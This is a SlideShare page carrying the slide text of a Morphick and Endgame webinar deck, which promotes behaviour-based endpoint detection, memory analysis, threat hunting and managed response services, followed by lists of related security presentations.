SlideShare a Scribd company logo

Three Considerations To Amplify Your Detection and Response Program

Morphick
Morphick

View the webinar on demand now! https://goo.gl/Mvv4Hw Defensive security technologies increasingly fail to prevent advanced attackers from gaining access to enterprise networks. Sophisticated attackers can only be stopped by proactive security measures that harness skilled analysts and advanced technology. Join Morphick and Endgame for a webinar to learn effective strategies to detect and eliminate advanced threats in your Enterprise. This webinar will highlight: - Today’s security landscape - How to close the protection gap - Three strategic considerations to stop advanced threats

Technology
1 of 21
Download to read offline
Three Considerations To Amplify Your Detection and Response Program with Mark Dufresne and David Lavinder Confidential and Proprietary
Who Are We? Mark Dufresne (@mark_dufresne) Endgame - Director of Threat Research and Adversary Prevention David Lavinder (@dllavinder) Morphick - Vice President, Threat Intelligence Prior: 13 years at NSA, Operations Chief for Offensive and Defensive Cyber Ops Prior: 7 years as Air Force Digital Network Intelligence Principal Intelligence Analyst Confidential and Proprietary
Topics §  3 Key Challenges to a Detection and Response Program –  Advanced TTPs –  Analytical Tradecraft –  Detection Methodologies §  The Morphick / Endgame Approach –  Beyond IOC/Signature Detection –  Uncovering the Full Story –  Integrated Prevention, Detection, and Response Confidential and Proprietary
Advanced TTPs §  New Attacks > Existing Defenses –  Paradigm Shift – Attackers are People §  Designed to defeat off-the-shelf defense –  Advanced Evasion Techniques –  Custom rolled malware Confidential and Proprietary §  In-memory Attacks –  DLL side-loading –  Malware-less attacks §  Malicious use of Admin Tools –  Powershell –  WMI
The Analytical Tradecraft Gap Confidential and Proprietary
The Detection Problem The technology problem: §  Limited enterprise-wide visibility §  Complex tools that don’t work well together §  Static defenses that do not adapt §  Difficult to deploy and maintain solutions §  SOC analyst talent shortage §  Alert fatigue §  Fighting an asymmetric battle §  Unprepared for an incident The people problem: Confidential and Proprietary
So What Do I Need? The right tradecraft armed with The right technology Confidential and Proprietary
The Right Technology §  Detection –  Beyond IOC/Signature-based detection §  Visibility –  Enabling visibility and rapid detection of unknown advanced attackers §  Prevention –  Automatically protecting against the vast majority of malicious activity Confidential and Proprietary
Beyond IOC/Signature-Based Detection §  Signatures (IOCs) aren’t enough §  Attackers adjust tools and tradecraft §  Attackers cycle infrastructure §  Attackers live off the land Good for pivoting. Bad foundation for protection. WHAT ABOUT THE UNKNOWN? Confidential and Proprietary
So What Should I Do Instead? 10 Confidential and Proprietary §  Focused on behaviors/techniques §  At each stage off the attacker lifecycle §  Layered and working together You need a different method of detection
But EVERYONE is Saying “Behavior” 11 Confidential and Proprietary §  NGAV – malware and exploit prevention §  But what about bypass and file-less attacks? Only part of the problem §  Both EDR and NGAV are adding detection of behaviors §  Capturing process actions and writing rules (IOAs) §  Still a signature. Still brittle. Vulnerable to bypass. §  Experts needed for configuration This is still not the right mix
Gather Visibility – Endpoints and Network §  You need full visibility on system events and other data –  Persistence –  Processes –  Network –  Users –  More §  A mountain of data doesn’t do you much good without analytics –  Endgame provides sophisticated analytics to guide the hunt –  Chatbot guides users through the hunt –  Robust API allows for flexible and powerful access and enrichment Confidential and Proprietary
Gather Visibility - Memory §  Memory is a permissive environment for attackers. Why? –  Memory analysis doesn’t scale –  Need to know what you are looking for (search based) –  Until now… §  Endgame technology –  Patent-pending technology detects stealthy adversaries in memory in seconds, at scale –  Detects process hollowing, thread hijacking, module hiding, and much more §  Precise identification of suspicious memory and remediation §  Follow on analytic actions such as extraction of IOCs Confidential and Proprietary
Behavioral Preventions §  Exploits – Hardware and Software approaches §  Macros – Detecting malicious execution of macros §  Malware – Machine learning (Malwarescore™) §  Kernel-level technique preventions –  Atomic-level system state in the presence of malicious behaviors –  More than streaming rules. Simple configuration, inline and hardened. §  Ransomware Layered prevention minimizes adversary’s capability to entrench Much more than traditional AV Confidential and Proprietary
The Right Tradecraft §  Analytical Pivoting –  Discovering unknowns from knowns, across the kill chain §  Generate Threat Intelligence –  Extract as much intel from a positive detection event as possible §  Harden Defenses –  Update defenses with new intelligence Confidential and Proprietary
Visibility Across the Kill Chain §  A security analyst’s job doesn’t END at detection, it BEGINS there §  Take that single detection event and explore the kill chain –  How did it get here? –  What was it going to do next? Confidential and Proprietary
Visibility Across the Kill Chain §  A security analyst’s job doesn’t END at detection, it BEGINS there §  Take that single detection event and explore the kill chain –  How did it get here? –  What was it going to do next? Confidential and Proprietary
The Power of a Security Analyst §  Discovering unknowns from knowns –  Identifying missed detection opportunities §  Telling the whole story –  Tracing an event to earlier kill chain steps §  Then BUILD IT BACK IN §  The analysis tradecraft is getting lost amongst all the tools §  Visibility is key, but good tradecraft unlocks the power of that visibility Confidential and Proprietary
SOLUTION §  Combination of Technology and Tradecraft Technology provides layered behavioral prevention Technology provides visibility and access Tradecraft finds the remaining adversary Tradecraft hardens defenses Confidential and Proprietary
Managed Endpoint Detection and Response (MEDR) §  Continuous Endpoint Threat Monitoring & Advanced Prevention §  Full Attack Cycle Threat Detection §  Proactive, scalable Threat Hunting §  Detailed Forensic Investigation and Threat Validation §  NSA-CIRA Accredited Incident Response Services Best in-class Tech, Wrapped in Best in-class Service Confidential and Proprietary
Interested in learning more? Come see us at RSA §  Endgame Booth, South Hall #1739 §  Morphick Booth, North Hall #5004 Schedule a Demo §  Endgame –  Ashwini Almad –  AAlmad@Endgame.com §  Morphick –  Tom Doepker –  Tom.Doepker@Morphick.com Confidential and Proprietary

Recommended

Dreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligenceDreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligencePriyanka Aash
 
Threat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the BasicsThreat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the BasicsCybereason
 
Crowd-Sourced Threat Intelligence
Crowd-Sourced Threat IntelligenceCrowd-Sourced Threat Intelligence
Crowd-Sourced Threat IntelligenceAlienVault
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...HITCON GIRLS
 
Click and Dragger: Denial and Deception on Android mobile
Click and Dragger: Denial and Deception on Android mobileClick and Dragger: Denial and Deception on Android mobile
Click and Dragger: Denial and Deception on Android mobilegrugq
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
The Rise of the Purple Team
The Rise of the Purple TeamThe Rise of the Purple Team
The Rise of the Purple TeamPriyanka Aash
 

Recommended

Dreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligenceDreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligencePriyanka Aash
 
Threat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the BasicsThreat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the BasicsCybereason
 
Crowd-Sourced Threat Intelligence
Crowd-Sourced Threat IntelligenceCrowd-Sourced Threat Intelligence
Crowd-Sourced Threat IntelligenceAlienVault
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...HITCON GIRLS
 
Click and Dragger: Denial and Deception on Android mobile
Click and Dragger: Denial and Deception on Android mobileClick and Dragger: Denial and Deception on Android mobile
Click and Dragger: Denial and Deception on Android mobilegrugq
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
The Rise of the Purple Team
The Rise of the Purple TeamThe Rise of the Purple Team
The Rise of the Purple TeamPriyanka Aash
 
Opsec for security researchers
Opsec for security researchersOpsec for security researchers
Opsec for security researchersvicenteDiaz_KL
 
The Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThe Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThreatConnect
 
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...MITRE - ATT&CKcon
 
Analogic Opsec 101
Analogic Opsec 101Analogic Opsec 101
Analogic Opsec 101vicenteDiaz_KL
 
TTPs for Threat hunting In Oil Refineries
TTPs for Threat hunting In Oil RefineriesTTPs for Threat hunting In Oil Refineries
TTPs for Threat hunting In Oil RefineriesDragos, Inc.
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Building a Threat Hunting Practice in the Cloud
Building a Threat Hunting Practice in the CloudBuilding a Threat Hunting Practice in the Cloud
Building a Threat Hunting Practice in the CloudProtectWise
 
The Cyber Threat Intelligence Matrix: Taking the attacker eviction red pill
The Cyber Threat Intelligence Matrix: Taking the attacker eviction red pillThe Cyber Threat Intelligence Matrix: Taking the attacker eviction red pill
The Cyber Threat Intelligence Matrix: Taking the attacker eviction red pillFrode Hommedal
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
An Underground education
An Underground educationAn Underground education
An Underground educationgrugq
 
What's a MITRE with your Security?
What's a MITRE with your Security?What's a MITRE with your Security?
What's a MITRE with your Security?MITRE - ATT&CKcon
 
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardBirds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardHITCON GIRLS
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...MITRE - ATT&CKcon
 
Threat Intelligence Is Like Three Day Potty Training
Threat Intelligence Is Like Three Day Potty TrainingThreat Intelligence Is Like Three Day Potty Training
Threat Intelligence Is Like Three Day Potty TrainingPriyanka Aash
 
Enabling effective hunt teaming and incident response
Enabling effective hunt teaming and incident responseEnabling effective hunt teaming and incident response
Enabling effective hunt teaming and incident responsejeffmcjunkin
 
From Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have ChangedFrom Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have ChangedMITRE - ATT&CKcon
 
MITRE ATTACKcon Power Hour - October
MITRE ATTACKcon Power Hour - OctoberMITRE ATTACKcon Power Hour - October
MITRE ATTACKcon Power Hour - OctoberMITRE - ATT&CKcon
 
Building a Successful Threat Hunting Program
Building a Successful Threat Hunting ProgramBuilding a Successful Threat Hunting Program
Building a Successful Threat Hunting ProgramCarl C. Manion
 
Gamification of your Global Information Security Operations Center - RSA 2015
Gamification of your Global Information Security Operations Center - RSA 2015Gamification of your Global Information Security Operations Center - RSA 2015
Gamification of your Global Information Security Operations Center - RSA 2015Morphick
 
Forrester Emerging MSSP Wave
Forrester Emerging MSSP WaveForrester Emerging MSSP Wave
Forrester Emerging MSSP WaveEnvision Technology Advisors
 

More Related Content

What's hot

Opsec for security researchers
Opsec for security researchersOpsec for security researchers
Opsec for security researchersvicenteDiaz_KL
 
The Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThe Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThreatConnect
 
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...MITRE - ATT&CKcon
 
TTPs for Threat hunting In Oil Refineries
TTPs for Threat hunting In Oil RefineriesTTPs for Threat hunting In Oil Refineries
TTPs for Threat hunting In Oil RefineriesDragos, Inc.
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Building a Threat Hunting Practice in the Cloud
Building a Threat Hunting Practice in the CloudBuilding a Threat Hunting Practice in the Cloud
Building a Threat Hunting Practice in the CloudProtectWise
 
The Cyber Threat Intelligence Matrix: Taking the attacker eviction red pill
The Cyber Threat Intelligence Matrix: Taking the attacker eviction red pillThe Cyber Threat Intelligence Matrix: Taking the attacker eviction red pill
The Cyber Threat Intelligence Matrix: Taking the attacker eviction red pillFrode Hommedal
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
An Underground education
An Underground educationAn Underground education
An Underground educationgrugq
 
What's a MITRE with your Security?
What's a MITRE with your Security?What's a MITRE with your Security?
What's a MITRE with your Security?MITRE - ATT&CKcon
 
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardBirds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardHITCON GIRLS
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...MITRE - ATT&CKcon
 
Threat Intelligence Is Like Three Day Potty Training
Threat Intelligence Is Like Three Day Potty TrainingThreat Intelligence Is Like Three Day Potty Training
Threat Intelligence Is Like Three Day Potty TrainingPriyanka Aash
 
Enabling effective hunt teaming and incident response
Enabling effective hunt teaming and incident responseEnabling effective hunt teaming and incident response
Enabling effective hunt teaming and incident responsejeffmcjunkin
 
From Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have ChangedFrom Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have ChangedMITRE - ATT&CKcon
 
MITRE ATTACKcon Power Hour - October
MITRE ATTACKcon Power Hour - OctoberMITRE ATTACKcon Power Hour - October
MITRE ATTACKcon Power Hour - OctoberMITRE - ATT&CKcon
 
Building a Successful Threat Hunting Program
Building a Successful Threat Hunting ProgramBuilding a Successful Threat Hunting Program
Building a Successful Threat Hunting ProgramCarl C. Manion
 

What's hot (20)

Opsec for security researchers
Opsec for security researchersOpsec for security researchers
Opsec for security researchers
 
The Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThe Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat Intelligence
 
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
 
Analogic Opsec 101
Analogic Opsec 101Analogic Opsec 101
Analogic Opsec 101
 
TTPs for Threat hunting In Oil Refineries
TTPs for Threat hunting In Oil RefineriesTTPs for Threat hunting In Oil Refineries
TTPs for Threat hunting In Oil Refineries
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with Phirelight
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
Building a Threat Hunting Practice in the Cloud
Building a Threat Hunting Practice in the CloudBuilding a Threat Hunting Practice in the Cloud
Building a Threat Hunting Practice in the Cloud
 
The Cyber Threat Intelligence Matrix: Taking the attacker eviction red pill
The Cyber Threat Intelligence Matrix: Taking the attacker eviction red pillThe Cyber Threat Intelligence Matrix: Taking the attacker eviction red pill
The Cyber Threat Intelligence Matrix: Taking the attacker eviction red pill
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
An Underground education
An Underground educationAn Underground education
An Underground education
 
What's a MITRE with your Security?
What's a MITRE with your Security?What's a MITRE with your Security?
What's a MITRE with your Security?
 
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardBirds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
 
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
 
Threat Intelligence Is Like Three Day Potty Training
Threat Intelligence Is Like Three Day Potty TrainingThreat Intelligence Is Like Three Day Potty Training
Threat Intelligence Is Like Three Day Potty Training
 
Enabling effective hunt teaming and incident response
Enabling effective hunt teaming and incident responseEnabling effective hunt teaming and incident response
Enabling effective hunt teaming and incident response
 
From Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have ChangedFrom Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have Changed
 
MITRE ATTACKcon Power Hour - October
MITRE ATTACKcon Power Hour - OctoberMITRE ATTACKcon Power Hour - October
MITRE ATTACKcon Power Hour - October
 
Building a Successful Threat Hunting Program
Building a Successful Threat Hunting ProgramBuilding a Successful Threat Hunting Program
Building a Successful Threat Hunting Program
 

Viewers also liked

Gamification of your Global Information Security Operations Center - RSA 2015
Gamification of your Global Information Security Operations Center - RSA 2015Gamification of your Global Information Security Operations Center - RSA 2015
Gamification of your Global Information Security Operations Center - RSA 2015Morphick
 
Rapid7 NERC-CIP Compliance Guide
Rapid7 NERC-CIP Compliance GuideRapid7 NERC-CIP Compliance Guide
Rapid7 NERC-CIP Compliance GuideRapid7
 
Le gouvernement électronique au Togo : Etat des lieux et prospectives
Le gouvernement électronique au Togo : Etat des lieux et prospectivesLe gouvernement électronique au Togo : Etat des lieux et prospectives
Le gouvernement électronique au Togo : Etat des lieux et prospectivesEASY EGOV
 
Its Not You Its Me MSSP Couples Counseling
Its Not You Its Me MSSP Couples CounselingIts Not You Its Me MSSP Couples Counseling
Its Not You Its Me MSSP Couples CounselingAtif Ghauri
 
To MSSP or not to MSSP IISF 2015
To MSSP or not to MSSP IISF 2015To MSSP or not to MSSP IISF 2015
To MSSP or not to MSSP IISF 2015Paul Hogan
 
AlienVault MSSP Overview - A Different Approach to Security for MSSP's
AlienVault MSSP Overview - A Different Approach to Security for MSSP'sAlienVault MSSP Overview - A Different Approach to Security for MSSP's
AlienVault MSSP Overview - A Different Approach to Security for MSSP'sAlienVault
 
#ALSummit: Accenture - Making the Move: Enabling Security in the Cloud
#ALSummit: Accenture - Making the Move: Enabling Security in the Cloud#ALSummit: Accenture - Making the Move: Enabling Security in the Cloud
#ALSummit: Accenture - Making the Move: Enabling Security in the CloudAlert Logic
 
Tapping into the Growth Goldmine: Why MSPs Should Join Peer Groups
Tapping into the Growth Goldmine: Why MSPs Should Join Peer GroupsTapping into the Growth Goldmine: Why MSPs Should Join Peer Groups
Tapping into the Growth Goldmine: Why MSPs Should Join Peer GroupseFolder
 
Key Ingredients for Your MSSP Offering
Key Ingredients for Your MSSP OfferingKey Ingredients for Your MSSP Offering
Key Ingredients for Your MSSP OfferingeFolder
 
Trustwave Cybersecurity Education Catalog
Trustwave Cybersecurity Education CatalogTrustwave Cybersecurity Education Catalog
Trustwave Cybersecurity Education CatalogTrustwave
 
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)Gabriel Dusil
 

Viewers also liked (12)

Gamification of your Global Information Security Operations Center - RSA 2015
Gamification of your Global Information Security Operations Center - RSA 2015Gamification of your Global Information Security Operations Center - RSA 2015
Gamification of your Global Information Security Operations Center - RSA 2015
 
Forrester Emerging MSSP Wave
Forrester Emerging MSSP WaveForrester Emerging MSSP Wave
Forrester Emerging MSSP Wave
 
Rapid7 NERC-CIP Compliance Guide
Rapid7 NERC-CIP Compliance GuideRapid7 NERC-CIP Compliance Guide
Rapid7 NERC-CIP Compliance Guide
 
Le gouvernement électronique au Togo : Etat des lieux et prospectives
Le gouvernement électronique au Togo : Etat des lieux et prospectivesLe gouvernement électronique au Togo : Etat des lieux et prospectives
Le gouvernement électronique au Togo : Etat des lieux et prospectives
 
Its Not You Its Me MSSP Couples Counseling
Its Not You Its Me MSSP Couples CounselingIts Not You Its Me MSSP Couples Counseling
Its Not You Its Me MSSP Couples Counseling
 
To MSSP or not to MSSP IISF 2015
To MSSP or not to MSSP IISF 2015To MSSP or not to MSSP IISF 2015
To MSSP or not to MSSP IISF 2015
 
AlienVault MSSP Overview - A Different Approach to Security for MSSP's
AlienVault MSSP Overview - A Different Approach to Security for MSSP'sAlienVault MSSP Overview - A Different Approach to Security for MSSP's
AlienVault MSSP Overview - A Different Approach to Security for MSSP's
 
#ALSummit: Accenture - Making the Move: Enabling Security in the Cloud
#ALSummit: Accenture - Making the Move: Enabling Security in the Cloud#ALSummit: Accenture - Making the Move: Enabling Security in the Cloud
#ALSummit: Accenture - Making the Move: Enabling Security in the Cloud
 
Tapping into the Growth Goldmine: Why MSPs Should Join Peer Groups
Tapping into the Growth Goldmine: Why MSPs Should Join Peer GroupsTapping into the Growth Goldmine: Why MSPs Should Join Peer Groups
Tapping into the Growth Goldmine: Why MSPs Should Join Peer Groups
 
Key Ingredients for Your MSSP Offering
Key Ingredients for Your MSSP OfferingKey Ingredients for Your MSSP Offering
Key Ingredients for Your MSSP Offering
 
Trustwave Cybersecurity Education Catalog
Trustwave Cybersecurity Education CatalogTrustwave Cybersecurity Education Catalog
Trustwave Cybersecurity Education Catalog
 
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
 

Similar to Three Considerations To Amplify Your Detection and Response Program

Security Breakout Session
Security Breakout Session Security Breakout Session
Security Breakout Session Splunk
 
Applied cognitive security complementing the security analyst
Applied cognitive security complementing the security analyst Applied cognitive security complementing the security analyst
Applied cognitive security complementing the security analyst Priyanka Aash
 
Incident Response: How To Prepare
Incident Response: How To PrepareIncident Response: How To Prepare
Incident Response: How To PrepareResilient Systems
 
Cause 11 im final
Cause 11 im finalCause 11 im final
Cause 11 im finalcavapyta
 
Cause 11 im final
Cause 11 im finalCause 11 im final
Cause 11 im finalcavapyta
 
RMS Security Breakfast
RMS Security BreakfastRMS Security Breakfast
RMS Security BreakfastRackspace
 
International Conference on Cyber Security, Hide and Go Seek
International Conference on Cyber Security, Hide and Go SeekInternational Conference on Cyber Security, Hide and Go Seek
International Conference on Cyber Security, Hide and Go SeekDavid Knox
 
Hunting before a Known Incident
Hunting before a Known IncidentHunting before a Known Incident
Hunting before a Known IncidentEndgameInc
 
Detect Unknown Threats, Reduce Dwell Time, Accelerate Response
Detect Unknown Threats, Reduce Dwell Time, Accelerate ResponseDetect Unknown Threats, Reduce Dwell Time, Accelerate Response
Detect Unknown Threats, Reduce Dwell Time, Accelerate ResponseRahul Neel Mani
 
SplunkLive Auckland 2015 - Splunk for Security
SplunkLive Auckland 2015 - Splunk for SecuritySplunkLive Auckland 2015 - Splunk for Security
SplunkLive Auckland 2015 - Splunk for SecuritySplunk
 
SplunkLive Wellington 2015 - Splunk for Security
SplunkLive Wellington 2015 - Splunk for SecuritySplunkLive Wellington 2015 - Splunk for Security
SplunkLive Wellington 2015 - Splunk for SecuritySplunk
 
Technical track chris calvert-1 30 pm-issa conference-calvert
Technical track chris calvert-1 30 pm-issa conference-calvertTechnical track chris calvert-1 30 pm-issa conference-calvert
Technical track chris calvert-1 30 pm-issa conference-calvertISSA LA
 
2015 Global APT Summit - Understanding APT threat agent characteristics is ke...
2015 Global APT Summit - Understanding APT threat agent characteristics is ke...2015 Global APT Summit - Understanding APT threat agent characteristics is ke...
2015 Global APT Summit - Understanding APT threat agent characteristics is ke...Matthew Rosenquist
 
2015 Global APT Summit Matthew Rosenquist
2015 Global APT Summit Matthew Rosenquist2015 Global APT Summit Matthew Rosenquist
2015 Global APT Summit Matthew RosenquistMatthew Rosenquist
 
Purple Teaming - The Collaborative Future of Penetration Testing
Purple Teaming - The Collaborative Future of Penetration TestingPurple Teaming - The Collaborative Future of Penetration Testing
Purple Teaming - The Collaborative Future of Penetration TestingFRSecure
 
Sophisticated Attacks vs. Advanced Persistent Security
Sophisticated Attacks vs. Advanced Persistent SecuritySophisticated Attacks vs. Advanced Persistent Security
Sophisticated Attacks vs. Advanced Persistent SecurityPriyanka Aash
 
Diagnosis SOC-Atrophy: What To Do When Your SOC Is Sick
Diagnosis SOC-Atrophy: What To Do When Your SOC Is SickDiagnosis SOC-Atrophy: What To Do When Your SOC Is Sick
Diagnosis SOC-Atrophy: What To Do When Your SOC Is SickPriyanka Aash
 
Endpoint (big) Data In The Age of Compromise, Ian Rainsburgh
Endpoint (big) Data In The Age of Compromise, Ian RainsburghEndpoint (big) Data In The Age of Compromise, Ian Rainsburgh
Endpoint (big) Data In The Age of Compromise, Ian RainsburghNapier University
 
pbc_devsecops_eastereggs.2022oct06.jt.pptx
pbc_devsecops_eastereggs.2022oct06.jt.pptxpbc_devsecops_eastereggs.2022oct06.jt.pptx
pbc_devsecops_eastereggs.2022oct06.jt.pptxJulie Tsai
 

Similar to Three Considerations To Amplify Your Detection and Response Program (20)

Security Breakout Session
Security Breakout Session Security Breakout Session
Security Breakout Session
 
Applied cognitive security complementing the security analyst
Applied cognitive security complementing the security analyst Applied cognitive security complementing the security analyst
Applied cognitive security complementing the security analyst
 
Incident Response: How To Prepare
Incident Response: How To PrepareIncident Response: How To Prepare
Incident Response: How To Prepare
 
Cause 11 im final
Cause 11 im finalCause 11 im final
Cause 11 im final
 
Cause 11 im final
Cause 11 im finalCause 11 im final
Cause 11 im final
 
RMS Security Breakfast
RMS Security BreakfastRMS Security Breakfast
RMS Security Breakfast
 
International Conference on Cyber Security, Hide and Go Seek
International Conference on Cyber Security, Hide and Go SeekInternational Conference on Cyber Security, Hide and Go Seek
International Conference on Cyber Security, Hide and Go Seek
 
Hunting before a Known Incident
Hunting before a Known IncidentHunting before a Known Incident
Hunting before a Known Incident
 
Detect Unknown Threats, Reduce Dwell Time, Accelerate Response
Detect Unknown Threats, Reduce Dwell Time, Accelerate ResponseDetect Unknown Threats, Reduce Dwell Time, Accelerate Response
Detect Unknown Threats, Reduce Dwell Time, Accelerate Response
 
SplunkLive Auckland 2015 - Splunk for Security
SplunkLive Auckland 2015 - Splunk for SecuritySplunkLive Auckland 2015 - Splunk for Security
SplunkLive Auckland 2015 - Splunk for Security
 
SplunkLive Wellington 2015 - Splunk for Security
SplunkLive Wellington 2015 - Splunk for SecuritySplunkLive Wellington 2015 - Splunk for Security
SplunkLive Wellington 2015 - Splunk for Security
 
Splunk for Security
Splunk for SecuritySplunk for Security
Splunk for Security
 
